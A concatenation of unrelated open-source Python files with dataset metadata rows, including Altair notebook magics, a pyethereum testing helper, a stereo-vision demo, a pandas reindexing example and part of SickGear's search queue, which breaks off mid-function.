mosimos/sr_data_generator | feeder/simple_feeder.py | 1 | 1456 | #!/usr/bin/python
# Copyright 2015 Andreas Mosburger
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import sys
import json
import time
import argparse
#streams triples from a file to a streaming engine
parser = argparse.ArgumentParser(description='Stream triples read from capture_file to stdout')
parser.add_argument('capture_file', type=argparse.FileType('r'))
parser.add_argument('-d', '--delay', type=float, default=0)
args = parser.parse_args()
for line in args.capture_file:
time.sleep(args.delay)
triple = line.rstrip()
triple = triple.split(" ")
if len(triple) == 3:
#simple triple, separated by blanks
print(json.dumps(triple))
sys.stdout.flush()
else:
if len(triple) == 4:
#simple triple, separated by blanks, timestamp in the front
print(json.dumps(triple[1:4]))
sys.stdout.flush()
else:
print('match error')
| apache-2.0 | -6,265,478,465,321,076,000 | 29.978723 | 95 | 0.684753 | false | 3.862069 | false | false | false |
kirbyfan64/shedskin | examples/stereo_main.py | 6 | 4284 | # James M. Coughlan
# Simple Belief Propagation stereo implementation using Shed Skin.
# Use speed-up technique from:
# J. Coughlan and H. Shen. "An Embarrassingly Simple Speed-Up of Belief Propagation with Robust Potentials." arXiv. 2010. http://arxiv.org/abs/1010.0012
import numpy as np
import pylab as pl
from scipy import interpolate
# above line must be imported *after* changing directory!
interp1d=interpolate.interp1d
from math import floor
import scipy
from scipy.misc import imread, imsave
from stereo import do_sweepsSS2
##############
Lnam, Rnam='L.bmp','R.bmp'
nd=40 #number of disparities
dmin,dmax=0,19 #min, max disparities
Tu,Tb=15,3 #discontinuity thresholds (unary, binary potentials)
unBeta,binBeta=1/5., 0.75
num_sweeps = 5
##############
#from integer index to real-valued disparity:
disps=[dmin + k/(nd-1.)*(dmax-dmin) for k in range(nd)]
pl.close('all')
pl.ion()
imL,imR=imread(Lnam)+0.,imread(Rnam)+0.
h,w=np.shape(imL)
print 'h,w:',h,w
rlo,rhi,clo,chi=0,h,0,w
h2,w2=h,w
print 'h2,w2:',h2,w2
#make unary potential:
print 'calculating unPots'
unPots=np.zeros((h2,w2,nd),float) #unPots[i,j,d]
errors=np.zeros((h2,w2,nd),float)
x_sparse=np.arange(w)
for i in range(rlo,rhi):
print 'row:',i,
y_sparse=imL[i,:]
for j in range(clo,chi):
func=interp1d(x_sparse,y_sparse)
x_dense=np.clip(np.array([j+d for d in disps]),0.,w-1) #clip so that nothing is out of bounds
y_dense=func(x_dense)
errors[i-rlo,j-clo,:]=np.array([min(abs(y-imR[i,j]),Tu) for y in y_dense])
unPots=np.exp(-unBeta*errors)
print
#make binary potential (homogeneous, and assume symmetric!):
print 'calculating binPots'
binPots=np.ones((nd,nd),float) #binPots[d0,d1]
f0=np.exp(-binBeta*Tb)
for d0 in range(nd):
for d1 in range(nd):
binPots[d0,d1]=np.exp(-binBeta*min(abs(d0-d1),Tb))
#make messages (Left, Right, Up, Down) and initialize to all ones:
#convention: all message indices [i,j] label ***source*** (not destination) of message
msgs={'L':np.ones((h2,w2,nd),float), 'R':np.ones((h2,w2,nd),float),
'U':np.ones((h2,w2,nd),float), 'D':np.ones((h2,w2,nd),float)}
def getbeliefs(unPots,msgs):
h,w,jnk=np.shape(unPots)
unBels=unPots+0.
for i0 in range(h):
for j0 in range(w):
incoming_nodes=[(i0-1,j0,'D'), (i0+1,j0,'U'), (i0,j0-1,'R'), (i0,j0+1,'L')]
for (i,j,direc) in incoming_nodes:
if i>=0 and i<h and j>=0 and j<w:
unBels[i0,j0,:] *= msgs[direc][i,j,:]
unBels[i0,j0,:] /= np.sum(unBels[i0,j0,:]) #normalize beliefs
return unBels #unBels[i,j,d]
def getwinners(unBels):
#at each pixel, what is the winning disparity?
h,w,nd=np.shape(unBels)
winners=np.ones((h,w),int)
for i in range(h):
for j in range(w):
winners[i,j]=np.argmax(unBels[i,j,:])
return winners
#(row,col) pixel ranges for each update direction, for use with range() function:
ranges={'L':[(0,h2,1),(w2-1,0,-1)],'R':[(0,h2,1),(0,w2-1,1)],'U':[(h2-1,0,-1),(0,w2,1)],'D':[(0,h2-1,1),(0,w2,1)]}
#note that range should go from right column to left column for 'L' update, etc.
#note: must be compatible with the SS version, which will work on messages padded on each side to eliminate special border cases
def do_sweeps(unPots, binPots, msgs, nsweeps):
h,w,nd=np.shape(msgs['L'])
h2,w2=h+2,w+2
msgs2={}
for dir in ['L','R','U','D']:
msgs2[dir]=np.ones((h2,w2,nd),float)
msgs2[dir][1:(h2-1),1:(w2-1),:]=msgs[dir]+0.
msgs2['L'],msgs2['R'],msgs2['U'],msgs2['D']=do_sweepsSS2(unPots.tolist(), binPots.tolist(), msgs2['L'].tolist(),msgs2['R'].tolist(),msgs2['U'].tolist(),msgs2['D'].tolist(), nsweeps, h2,w2,nd, Tb, f0)
for dir in ['L','R','U','D']:
msgs2[dir]=np.array(msgs2[dir]) #convert from lists:
msgs2[dir]=msgs2[dir][1:(h2-1),1:(w2-1)][:]+0
return msgs2
#do BP sweeps:
msgs=do_sweeps(unPots, binPots, msgs, num_sweeps)
unBels=getbeliefs(unPots,msgs)
winners=getwinners(unBels)
pl.figure();pl.imshow(winners,interpolation='nearest');pl.title('winners');pl.colorbar()
pl.show()
raw_input('<press enter>')
| gpl-3.0 | 161,251,538,424,213,600 | 32.829268 | 203 | 0.619981 | false | 2.464902 | false | false | false |
ellisonbg/altair | altair/_magics.py | 1 | 5226 | """
Magic functions for rendering vega/vega-lite specifications
"""
__all__ = ['vega', 'vegalite']
import json
import warnings
import IPython
from IPython.core import magic_arguments
import pandas as pd
import six
from toolz import pipe
from altair.vegalite import v1 as vegalite_v1
from altair.vegalite import v2 as vegalite_v2
from altair.vega import v2 as vega_v2
from altair.vega import v3 as vega_v3
try:
import yaml
YAML_AVAILABLE = True
except ImportError:
YAML_AVAILABLE = False
RENDERERS = {
'vega': {
'2': vega_v2.Vega,
'3': vega_v3.Vega,
},
'vega-lite': {
'1': vegalite_v1.VegaLite,
'2': vegalite_v2.VegaLite,
}
}
TRANSFORMERS = {
'vega': {
# Vega doesn't yet have specific data transformers; use vegalite
'2': vegalite_v1.data_transformers,
'3': vegalite_v2.data_transformers,
},
'vega-lite': {
'1': vegalite_v1.data_transformers,
'2': vegalite_v2.data_transformers,
}
}
def _prepare_data(data, data_transformers):
"""Convert input data to data for use within schema"""
if data is None or isinstance(data, dict):
return data
elif isinstance(data, pd.DataFrame):
return pipe(data, data_transformers.get())
elif isinstance(data, six.string_types):
return {'url': data}
else:
warnings.warn("data of type {0} not recognized".format(type(data)))
return data
def _get_variable(name):
"""Get a variable from the notebook namespace."""
ip = IPython.get_ipython()
if ip is None:
raise ValueError("Magic command must be run within an IPython "
"environemnt, in which get_ipython() is defined.")
if name not in ip.user_ns:
raise NameError("argument '{0}' does not match the "
"name of any defined variable".format(name))
return ip.user_ns[name]
@magic_arguments.magic_arguments()
@magic_arguments.argument(
'data',
nargs='*',
help='local variable name of a pandas DataFrame to be used as the dataset')
@magic_arguments.argument('-v', '--version', dest='version', default='3')
@magic_arguments.argument('-j', '--json', dest='json', action='store_true')
def vega(line, cell):
"""Cell magic for displaying Vega visualizations in CoLab.
%%vega [name1:variable1 name2:variable2 ...] [--json] [--version='3']
Visualize the contents of the cell using Vega, optionally specifying
one or more pandas DataFrame objects to be used as the datasets.
If --json is passed, then input is parsed as json rather than yaml.
"""
args = magic_arguments.parse_argstring(vega, line)
version = args.version
assert version in RENDERERS['vega']
Vega = RENDERERS['vega'][version]
data_transformers = TRANSFORMERS['vega'][version]
def namevar(s):
s = s.split(':')
if len(s) == 1:
return s[0], s[0]
elif len(s) == 2:
return s[0], s[1]
else:
raise ValueError("invalid identifier: '{0}'".format(s))
try:
data = list(map(namevar, args.data))
except ValueError:
raise ValueError("Could not parse arguments: '{0}'".format(line))
if args.json:
spec = json.loads(cell)
elif not YAML_AVAILABLE:
try:
spec = json.loads(cell)
except json.JSONDecodeError:
raise ValueError("%%vega: spec is not valid JSON. "
"Install pyyaml to parse spec as yaml")
else:
spec = yaml.load(cell)
if data:
spec['data'] = []
for name, val in data:
val = _get_variable(val)
prepped = _prepare_data(val, data_transformers)
prepped['name'] = name
spec['data'].append(prepped)
return Vega(spec)
@magic_arguments.magic_arguments()
@magic_arguments.argument(
'data',
nargs='?',
help='local variablename of a pandas DataFrame to be used as the dataset')
@magic_arguments.argument('-v', '--version', dest='version', default='2')
@magic_arguments.argument('-j', '--json', dest='json', action='store_true')
def vegalite(line, cell):
"""Cell magic for displaying vega-lite visualizations in CoLab.
%%vegalite [dataframe] [--json] [--version=2]
Visualize the contents of the cell using Vega-Lite, optionally
specifying a pandas DataFrame object to be used as the dataset.
if --json is passed, then input is parsed as json rather than yaml.
"""
args = magic_arguments.parse_argstring(vegalite, line)
version = args.version
assert version in RENDERERS['vega-lite']
VegaLite = RENDERERS['vega-lite'][version]
data_transformers = TRANSFORMERS['vega-lite'][version]
if args.json:
spec = json.loads(cell)
elif not YAML_AVAILABLE:
try:
spec = json.loads(cell)
except json.JSONDecodeError:
raise ValueError("%%vegalite: spec is not valid JSON. "
"Install pyyaml to parse spec as yaml")
else:
spec = yaml.load(cell)
if args.data is not None:
data = _get_variable(args.data)
spec['data'] = _prepare_data(data, data_transformers)
return VegaLite(spec)
| bsd-3-clause | 8,783,827,984,406,396,000 | 28.693182 | 79 | 0.626674 | false | 3.589286 | false | false | false |
cc1-cloud/cc1 | src/wi/forms/cm.py | 1 | 1670 | # -*- coding: utf-8 -*-
# @COPYRIGHT_begin
#
# Copyright [2010-2014] Institute of Nuclear Physics PAN, Krakow, Poland
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# @COPYRIGHT_end
"""@package src.wi.forms.cm
@author Krzysztof Danielowski
@author Piotr Wójcik
@date 03.12.2010
"""
from django import forms
from django.utils.translation import ugettext_lazy as _
from wi.utils.forms import PasswordForm, attrs_dict
from wi.utils.regexp import regexp, regexp_text
class EditCMForm(forms.Form):
"""
Class for <b>CM edition</b> form.
"""
name = forms.RegexField(regex=regexp['dev_name'],
max_length=40,
label=_("Name"),
widget=forms.TextInput(attrs=attrs_dict),
error_messages={'invalid': regexp_text['dev_name']})
address = forms.CharField(widget=forms.TextInput(attrs=dict(attrs_dict, maxlength=45)),
label=_("Address"))
port = forms.IntegerField(label=_("Port"))
class CreateCMForm(EditCMForm, PasswordForm):
"""
Class for <b>CM creation</b> form.
"""
| apache-2.0 | 2,417,444,015,431,224,300 | 31.72549 | 91 | 0.648292 | false | 3.810502 | false | false | false |
joelcan/tools-eth-contract-dev | pyethereum/pyethereum/tester.py | 1 | 7747 | import shutil
import tempfile
import time
import logging
import sys
import spv
import pyethereum
import pyethereum.db as db
import pyethereum.opcodes as opcodes
from pyethereum.slogging import get_logger, LogRecorder, configure_logging
serpent = None
u = pyethereum.utils
t = pyethereum.transactions
b = pyethereum.blocks
pb = pyethereum.processblock
vm = pyethereum.vm
accounts = []
keys = []
for i in range(10):
keys.append(u.sha3(str(i)))
accounts.append(u.privtoaddr(keys[-1]))
k0, k1, k2, k3, k4, k5, k6, k7, k8, k9 = keys[:10]
a0, a1, a2, a3, a4, a5, a6, a7, a8, a9 = accounts[:10]
seed = 3 ** 160
# Pseudo-RNG (deterministic for now for testing purposes)
def rand():
global seed
seed = pow(seed, 2, 2 ** 512)
return seed % 2 ** 256
class state():
def __init__(self, num_accounts=len(keys)):
global serpent
if not serpent:
serpent = __import__('serpent')
self.temp_data_dir = tempfile.mkdtemp()
self.db = db.DB(u.db_path(self.temp_data_dir))
o = {}
for i in range(num_accounts):
o[accounts[i]] = 10 ** 24
self.block = b.genesis(self.db, o)
self.blocks = [self.block]
self.block.timestamp = 1410973349
self.block.coinbase = a0
self.block.gas_limit = 10 ** 9
def __del__(self):
shutil.rmtree(self.temp_data_dir)
def contract(self, code, sender=k0, endowment=0):
evm = serpent.compile(code)
print('>>> contract() evm type = {}'.format(type(evm)))
print('>>> contract() evm = {}'.format(evm))
o = self.evm(evm, sender, endowment)
assert len(self.block.get_code(o)), "Contract code empty"
return o
def contract_from_evm(self, evm, sender=k0, endowment=0):
print('>>> contract_from_evm() evm type = {}'.format(type(evm)))
o = self.evm(evm, sender, endowment)
assert len(self.block.get_code(o)), "Contract code empty"
return o
def abi_contract(me, code, sender=k0, endowment=0):
class _abi_contract():
def __init__(self, _state, code, sender=k0, endowment=0):
evm = serpent.compile(code)
self.address = me.evm(evm, sender, endowment)
assert len(me.block.get_code(self.address)), \
"Contract code empty"
sig = serpent.mk_signature(code)
sig = sig[sig.find('[')+1:sig.rfind(']')].split(',')
for i, s in enumerate(sig):
fun = s[:s.find(':')].strip()
funsig = s[s.find(':')+1:].strip()
def kall_factory(fun, funsig):
def kall(*abi, **kwargs):
if len(funsig) != len(abi):
raise Exception("Wrong number of arguments!")
for typ, val in zip(funsig, abi):
typ2 = 'i' if isinstance(val, (int, long)) else \
's' if isinstance(val, (str, unicode)) else \
'a' if isinstance(val, list) else 'err'
if typ != typ2:
raise Exception('Type mismatch!')
return _state.send(kwargs.get('sender', k0),
self.address,
kwargs.get('value', 0),
funid=i, abi=abi)
return kall
vars(self)[fun] = kall_factory(fun, funsig)
return _abi_contract(me, code, sender, endowment)
def evm(self, evm, sender=k0, endowment=0):
sendnonce = self.block.get_nonce(u.privtoaddr(sender))
tx = t.contract(sendnonce, 1, gas_limit, endowment, evm)
tx.sign(sender)
(s, a) = pb.apply_transaction(self.block, tx)
if not s:
raise Exception("Contract creation failed")
return a
def send(self, sender, to, value, data=[], funid=None, abi=None):
sendnonce = self.block.get_nonce(u.privtoaddr(sender))
if funid is not None:
evmdata = serpent.encode_abi(funid, *abi)
else:
evmdata = serpent.encode_datalist(*data)
tx = t.Transaction(sendnonce, 1, gas_limit, to, value, evmdata)
self.last_tx = tx
tx.sign(sender)
(s, r) = pb.apply_transaction(self.block, tx)
if not s:
raise Exception("Transaction failed")
o = serpent.decode_datalist(r)
return map(lambda x: x - 2 ** 256 if x >= 2 ** 255 else x, o)
def profile(self, sender, to, value, data=[], funid=None, abi=None):
tm, g = time.time(), self.block.gas_used
o = self.send(sender, to, value, data, funid, abi)
zero_bytes = self.last_tx.data.count(chr(0))
non_zero_bytes = len(self.last_tx.data) - zero_bytes
intrinsic_gas_used = opcodes.GTXDATAZERO * zero_bytes + \
opcodes.GTXDATANONZERO * non_zero_bytes
return {
"time": time.time() - tm,
"gas": self.block.gas_used - g - intrinsic_gas_used,
"output": o
}
def mkspv(self, sender, to, value, data=[], funid=None, abi=None):
sendnonce = self.block.get_nonce(u.privtoaddr(sender))
if funid is not None:
evmdata = serpent.encode_abi(funid, *abi)
else:
evmdata = serpent.encode_datalist(*data)
tx = t.Transaction(sendnonce, 1, gas_limit, to, value, evmdata)
self.last_tx = tx
tx.sign(sender)
return spv.mk_transaction_spv_proof(self.block, tx)
def verifyspv(self, sender, to, value, data=[],
funid=None, abi=None, proof=[]):
sendnonce = self.block.get_nonce(u.privtoaddr(sender))
if funid is not None:
evmdata = serpent.encode_abi(funid, *abi)
else:
evmdata = serpent.encode_datalist(*data)
tx = t.Transaction(sendnonce, 1, gas_limit, to, value, evmdata)
self.last_tx = tx
tx.sign(sender)
return spv.verify_transaction_spv_proof(self.block, tx, proof)
def trace(self, sender, to, value, data=[]):
# collect log events (independent of loglevel filters)
recorder = LogRecorder()
self.send(sender, to, value, data)
return recorder.pop_records()
def mine(self, n=1, coinbase=a0):
for i in range(n):
self.block.finalize()
t = self.block.timestamp + 6 + rand() % 12
self.block = b.Block.init_from_parent(self.block, coinbase, '', t)
self.blocks.append(self.block)
def snapshot(self):
return self.block.serialize()
def revert(self, data):
self.block = b.Block.deserialize(self.db, data)
# logging
def set_logging_level(lvl=1):
trace_lvl_map = [
':info',
'eth.vm.log:trace',
':info,eth.vm.log:trace,eth.vm.exit:trace',
':info,eth.vm.log:trace,eth.vm.op:trace,eth.vm.stack:trace',
':info,eth.vm.log:trace,eth.vm.op:trace,eth.vm.stack:trace,' +
'eth.vm.storage:trace,eth.vm.memory:trace'
]
configure_logging(config_string=trace_lvl_map[lvl])
print 'Set logging level: %d' % lvl
def set_log_trace(logger_names=[]):
"""
sets all named loggers to level 'trace'
attention: vm.op.* are only active if vm.op is active
"""
for name in logger_names:
assert name in slogging.get_logger_names()
slogging.set_level(name, 'trace')
def enable_logging():
set_logging_level(1)
def disable_logging():
set_logging_level(0)
gas_limit = 1000000
| mit | 3,399,322,480,247,476,700 | 33.431111 | 84 | 0.553763 | false | 3.377071 | false | false | false |
TheLartians/PyPropagate | pypropagate/presets/boundaries.py | 1 | 2618 |
def set_1D_boundary_condition(settings):
from expresso.pycas import exp
s = settings.simulation_box
pe = settings.partial_differential_equation
pe.u_boundary = pe.u0.subs(s.z,s.zmin) * exp(pe.F.subs(s.z,s.zmin)*s.z)
def set_plane_wave_initial_conditions(settings):
"""Sets the boundary conditions to a plane wave with intensity 1.
The boundary are set to the index of refraction at z=0."""
s = settings.simulation_box
pe = settings.partial_differential_equation
pe.u0 = 1
set_1D_boundary_condition(settings)
def add_padding(array,factor,mode = 'edge',**kwargs):
import numpy as np
from ..coordinate_ndarray import CoordinateNDArray
padding_points = [[int(x*factor)]*2 for x in array.data.shape]
new_data = np.pad(array.data,padding_points,mode,**kwargs)
extension = [d*p[0] for d,p in zip(array._dbounds,padding_points)]
new_bounds = [(b-i,e+i) for i,(b,e) in zip(extension,array.bounds)]
return CoordinateNDArray(new_data,new_bounds,array.axis,array.evaluate)
def set_initial(settings,initial_array):
import expresso.pycas as pc
from ..coordinate_ndarray import CoordinateNDArray
if isinstance(initial_array,CoordinateNDArray):
initial = pc.array("initial",initial_array.data)
else:
initial = pc.array("initial",initial_array)
sb = settings.simulation_box
if tuple(initial_array.axis) == (sb.x,):
settings.partial_differential_equation.u0 = initial(sb.xi)
elif tuple(initial_array.axis) == (sb.x,sb.y):
settings.partial_differential_equation.u0 = initial(sb.yi,sb.xi)
sb.Ny = initial_array.shape[1]
if isinstance(initial_array,CoordinateNDArray):
sb.unlock('ymin')
sb.unlock('ymax')
sb.unlock('sy')
sb.ymin = initial_array.bounds[1][0]
sb.ymax = initial_array.bounds[1][1]
sb.sy = sb.ymax - sb.ymin
sb.lock('ymin','defined by initial array')
sb.lock('ymax','defined by initial array')
sb.lock('sy','defined by ymin and ymax')
else:
raise ValueError('initial array axis must be (x,) or (x,y)')
sb.Nx = initial_array.shape[0]
if isinstance(initial_array,CoordinateNDArray):
sb.unlock('xmin')
sb.unlock('xmax')
sb.unlock('sx')
sb.xmin = initial_array.bounds[0][0]
sb.xmax = initial_array.bounds[0][1]
sb.sx = sb.xmax - sb.xmin
sb.lock('xmin','defined by initial array')
sb.lock('xmax','defined by initial array')
sb.lock('sx','defined by xmin and xmax')
| gpl-3.0 | 7,768,564,459,612,533,000 | 32.564103 | 75 | 0.641329 | false | 3.431193 | false | false | false |
danmichaelo/wm_metrics | wm_metrics/cat2cohort.py | 2 | 2568 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Export a Wiki category into a cohort.
The aim of this script is to allow program leaders to export a category
filled with User pages into a WikiMetrics cohort CSV file in order to
perform their evaluation analysis.
Test:
python cat2cohort.py -l fr -c "Utilisateur participant au projet Afripédia"
"""
import mw_api
import mw_util
def api_url(lang):
"""Return the URL of the API based on the language of Wikipedia."""
return "https://%s.wikipedia.org/w/api.php" % lang
def list_users(mw, category, lang):
"""List users from a wiki category and print lines of the cohort CSV."""
list_query = mw_api.MwApiQuery(properties={
"list": "categorymembers",
"cmtitle": category,
"cmprop": "ids|title|timestamp",
"cmtype": "page",
"cmsort": "sortkey",
"cmdir": "asc",
"cmlimit": "max"
})
for page in mw.process_query(list_query):
if ":" in page['title']:
username = page['title'].split(":")[1]
yield (username, lang)
def cat_to_cohort(language, category):
"""Return the CSV cohort from the given category and language."""
mw = mw_api.MwWiki(url_api=api_url(language))
user_list = list_users(mw, mw_util.str2cat(category), language)
csv_text = _userlist_to_CSV_cohort(user_list)
return csv_text
def _userlist_to_CSV_cohort(user_list):
"""Return the given user list as a CSV cohort."""
return '\n'.join([_make_CSV_line(username, language)
for (username, language) in user_list])
def _make_CSV_line(username, language):
"""Return a WikiMetrics compatible CSV line."""
return "%s, %swiki" % (username, language)
def main():
"""Main function of the script cat2cohort."""
from argparse import ArgumentParser
description = "Export a Wiki category into a cohort"
parser = ArgumentParser(description=description)
parser.add_argument("-c", "--category",
type=str,
dest="category",
metavar="CAT",
required=True,
help="The wiki category to export")
parser.add_argument("-l", "--lang",
type=str,
dest="lang",
metavar="LANG",
required=True,
help="Wiki language")
args = parser.parse_args()
print cat_to_cohort(args.lang, args.category)
if __name__ == "__main__":
main()
| mit | -4,253,803,989,498,470,400 | 28.848837 | 79 | 0.586677 | false | 3.88351 | false | false | false |
lamontu/data-analysis | pandas/reindexing.py | 1 | 1202 | # -*- coding: utf-8 -*-
import numpy as np
from pandas import DataFrame, Series
print("## Redesignate index and order:")
obj = Series([4.5, 7.2, -5.3, 3.6], index=['d', 'b', 'a', 'c'])
print(obj)
obj2 = obj.reindex(['a', 'b', 'd', 'c', 'e'])
print(obj2)
print("### fill with specified value if the index not exist:")
obj3 = obj.reindex(['a', 'b', 'd', 'c', 'e'], fill_value=0)
print(obj3)
print()
print("## Redesignate index and fill method:")
obj4 = Series(['blue', 'purple', 'yellow'], index=[0, 2, 4])
print(obj4)
print(obj4.reindex(range(6), method='ffill'))
print()
print("## Redesignate index of DataFrame:")
frame = DataFrame(np.arange(9).reshape(3, 3),
index = ['a', 'c', 'd'],
columns = ['Ohio', 'Texas', 'California'])
print(frame)
frame2 = frame.reindex(['a', 'b', 'c', 'd'])
print(frame2)
print()
print("## Redesignate column:")
states = ['Texas', 'Utah', 'California']
print(frame.reindex(columns=states))
print()
print("## Redesignate index of DataFrame and fill method:")
print(frame.reindex(index = ['a', 'b', 'c', 'd'],
method = 'ffill',
columns = states))
print(frame.ix[['a', 'b', 'd', 'c'], states])
| gpl-3.0 | 3,242,217,310,844,328,000 | 29.05 | 63 | 0.578203 | false | 2.889423 | false | true | false |
adam111316/SickGear | sickbeard/search_queue.py | 3 | 17877 | # Author: Nic Wolfe <[email protected]>
# URL: http://code.google.com/p/sickbeard/
#
# This file is part of SickGear.
#
# SickGear is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# SickGear is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with SickGear. If not, see <http://www.gnu.org/licenses/>.
from __future__ import with_statement
import time
import traceback
import threading
import datetime
import sickbeard
from sickbeard import db, logger, common, exceptions, helpers, network_timezones, generic_queue, search, \
failed_history, history, ui, properFinder
from sickbeard.search import wantedEpisodes
search_queue_lock = threading.Lock()
BACKLOG_SEARCH = 10
RECENT_SEARCH = 20
FAILED_SEARCH = 30
MANUAL_SEARCH = 40
PROPER_SEARCH = 50
MANUAL_SEARCH_HISTORY = []
MANUAL_SEARCH_HISTORY_SIZE = 100
class SearchQueue(generic_queue.GenericQueue):
def __init__(self):
generic_queue.GenericQueue.__init__(self)
self.queue_name = 'SEARCHQUEUE'
def is_in_queue(self, show, segment):
with self.lock:
for cur_item in self.queue:
if isinstance(cur_item, BacklogQueueItem) and cur_item.show == show and cur_item.segment == segment:
return True
return False
def is_ep_in_queue(self, segment):
with self.lock:
for cur_item in self.queue:
if isinstance(cur_item, (ManualSearchQueueItem, FailedQueueItem)) and cur_item.segment == segment:
return True
return False
def is_show_in_queue(self, show):
with self.lock:
for cur_item in self.queue:
if isinstance(cur_item, (ManualSearchQueueItem, FailedQueueItem)) and cur_item.show.indexerid == show:
return True
return False
def get_all_ep_from_queue(self, show):
with self.lock:
ep_obj_list = []
for cur_item in self.queue:
if isinstance(cur_item, (ManualSearchQueueItem, FailedQueueItem)) and str(cur_item.show.indexerid) == show:
ep_obj_list.append(cur_item)
if ep_obj_list:
return ep_obj_list
return False
def pause_backlog(self):
with self.lock:
self.min_priority = generic_queue.QueuePriorities.HIGH
def unpause_backlog(self):
with self.lock:
self.min_priority = 0
def is_backlog_paused(self):
# backlog priorities are NORMAL, this should be done properly somewhere
with self.lock:
return self.min_priority >= generic_queue.QueuePriorities.NORMAL
def _is_in_progress(self, itemType):
with self.lock:
for cur_item in self.queue + [self.currentItem]:
if isinstance(cur_item, itemType):
return True
return False
def is_manualsearch_in_progress(self):
# Only referenced in webserve.py, only current running manualsearch or failedsearch is needed!!
return self._is_in_progress((ManualSearchQueueItem, FailedQueueItem))
def is_backlog_in_progress(self):
return self._is_in_progress(BacklogQueueItem)
def is_recentsearch_in_progress(self):
return self._is_in_progress(RecentSearchQueueItem)
def is_propersearch_in_progress(self):
return self._is_in_progress(ProperSearchQueueItem)
def is_standard_backlog_in_progress(self):
with self.lock:
for cur_item in self.queue + [self.currentItem]:
if isinstance(cur_item, BacklogQueueItem) and cur_item.standard_backlog:
return True
return False
def type_of_backlog_in_progress(self):
limited = full = other = False
with self.lock:
for cur_item in self.queue + [self.currentItem]:
if isinstance(cur_item, BacklogQueueItem):
if cur_item.standard_backlog:
if cur_item.limited_backlog:
limited = True
else:
full = True
else:
other = True
types = []
for msg, variant in ['Limited', limited], ['Full', full], ['On Demand', other]:
if variant:
types.append(msg)
message = 'None'
if types:
message = ', '.join(types)
return message
def queue_length(self):
length = {'backlog': [], 'recent': 0, 'manual': [], 'failed': [], 'proper': 0}
with self.lock:
for cur_item in [self.currentItem] + self.queue:
if isinstance(cur_item, RecentSearchQueueItem):
length['recent'] += 1
elif isinstance(cur_item, BacklogQueueItem):
length['backlog'].append([cur_item.show.indexerid, cur_item.show.name, cur_item.segment, cur_item.standard_backlog, cur_item.limited_backlog, cur_item.forced])
elif isinstance(cur_item, ProperSearchQueueItem):
length['proper'] += 1
elif isinstance(cur_item, ManualSearchQueueItem):
length['manual'].append([cur_item.show.indexerid, cur_item.show.name, cur_item.segment])
elif isinstance(cur_item, FailedQueueItem):
length['failed'].append([cur_item.show.indexerid, cur_item.show.name, cur_item.segment])
return length
def add_item(self, item):
if isinstance(item, (RecentSearchQueueItem, ProperSearchQueueItem)):
# recent and proper searches
generic_queue.GenericQueue.add_item(self, item)
elif isinstance(item, BacklogQueueItem) and not self.is_in_queue(item.show, item.segment):
# backlog searches
generic_queue.GenericQueue.add_item(self, item)
elif isinstance(item, (ManualSearchQueueItem, FailedQueueItem)) and not self.is_ep_in_queue(item.segment):
# manual and failed searches
generic_queue.GenericQueue.add_item(self, item)
else:
logger.log(u'Not adding item, it\'s already in the queue', logger.DEBUG)
class RecentSearchQueueItem(generic_queue.QueueItem):
def __init__(self):
self.success = None
self.episodes = []
generic_queue.QueueItem.__init__(self, 'Recent Search', RECENT_SEARCH)
def run(self):
generic_queue.QueueItem.run(self)
try:
self._change_missing_episodes()
self.update_providers()
show_list = sickbeard.showList
fromDate = datetime.date.fromordinal(1)
for curShow in show_list:
if curShow.paused:
continue
self.episodes.extend(wantedEpisodes(curShow, fromDate))
if not self.episodes:
logger.log(u'No search of cache for episodes required')
self.success = True
else:
num_shows = len(set([ep.show.name for ep in self.episodes]))
logger.log(u'Found %d needed episode%s spanning %d show%s'
% (len(self.episodes), helpers.maybe_plural(len(self.episodes)),
num_shows, helpers.maybe_plural(num_shows)))
try:
logger.log(u'Beginning recent search for episodes')
found_results = search.searchForNeededEpisodes(self.episodes)
if not len(found_results):
logger.log(u'No needed episodes found')
else:
for result in found_results:
# just use the first result for now
logger.log(u'Downloading %s from %s' % (result.name, result.provider.name))
self.success = search.snatchEpisode(result)
# give the CPU a break
time.sleep(common.cpu_presets[sickbeard.CPU_PRESET])
except Exception:
logger.log(traceback.format_exc(), logger.DEBUG)
if self.success is None:
self.success = False
finally:
self.finish()
@staticmethod
def _change_missing_episodes():
if not network_timezones.network_dict:
network_timezones.update_network_dict()
if network_timezones.network_dict:
curDate = (datetime.date.today() + datetime.timedelta(days=1)).toordinal()
else:
curDate = (datetime.date.today() - datetime.timedelta(days=2)).toordinal()
curTime = datetime.datetime.now(network_timezones.sb_timezone)
myDB = db.DBConnection()
sqlResults = myDB.select('SELECT * FROM tv_episodes WHERE status = ? AND season > 0 AND airdate <= ?',
[common.UNAIRED, curDate])
sql_l = []
show = None
wanted = False
for sqlEp in sqlResults:
try:
if not show or int(sqlEp['showid']) != show.indexerid:
show = helpers.findCertainShow(sickbeard.showList, int(sqlEp['showid']))
# for when there is orphaned series in the database but not loaded into our showlist
if not show:
continue
except exceptions.MultipleShowObjectsException:
logger.log(u'ERROR: expected to find a single show matching ' + str(sqlEp['showid']))
continue
try:
end_time = network_timezones.parse_date_time(sqlEp['airdate'], show.airs, show.network) + datetime.timedelta(minutes=helpers.tryInt(show.runtime, 60))
# filter out any episodes that haven't aired yet
if end_time > curTime:
continue
except:
# if an error occurred assume the episode hasn't aired yet
continue
ep = show.getEpisode(int(sqlEp['season']), int(sqlEp['episode']))
